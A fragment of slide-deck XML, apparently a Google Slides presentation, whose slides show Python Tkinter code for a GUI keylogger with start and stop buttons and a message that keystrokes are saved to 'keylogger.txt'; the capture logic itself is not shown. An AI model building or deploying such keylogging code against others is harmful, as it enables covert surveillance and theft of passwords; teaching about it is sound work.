              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>    label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>    start_button.config(state='disabled')</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>    stop_button.config(state='normal')</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def stop_keylogger():</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>    listener.stop()</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>    label.config(text="Keylogger stopped.")</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>    start_button.config(state='normal')</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>    stop_button.config(state='disabled')</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root = Tk()</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>root.title("Keylogger")</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label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>label.config(anchor=CENTER)</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>label.pack()</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start_button = Button(root, text="Start", command=start_keylogger)</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>start_button.pack(side=LEFT)</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stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled')</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>stop_button.pack(side=RIGHT)</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root.geometry("250x250")</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>root.mainloop()</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="92000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048624" name="Google Shape;142;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1231075" y="1458675"/>
            <a:ext cx="10877700" cy="386050"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0" bIns="91425" lIns="91425" rIns="91425" spcFirstLastPara="1" tIns="91425" wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1700" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Libre Franklin"/>
                <a:ea typeface="Libre Franklin"/>
                <a:cs typeface="Libre Franklin"/>
                <a:sym typeface="Libre Franklin"/>
              </a:rPr>
              <a:t>i</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Shape 146"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048627" name="Google Shape;147;p21"/>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28" name="Google Shape;148;p21"/>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1840"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>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CPH2127</dc:creator>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-09T04:38:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-09T04:38:40Z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cb01faab65f94a89b766c2bb777932d0</vt:lpwstr>
  </property>
</Properties>
</file>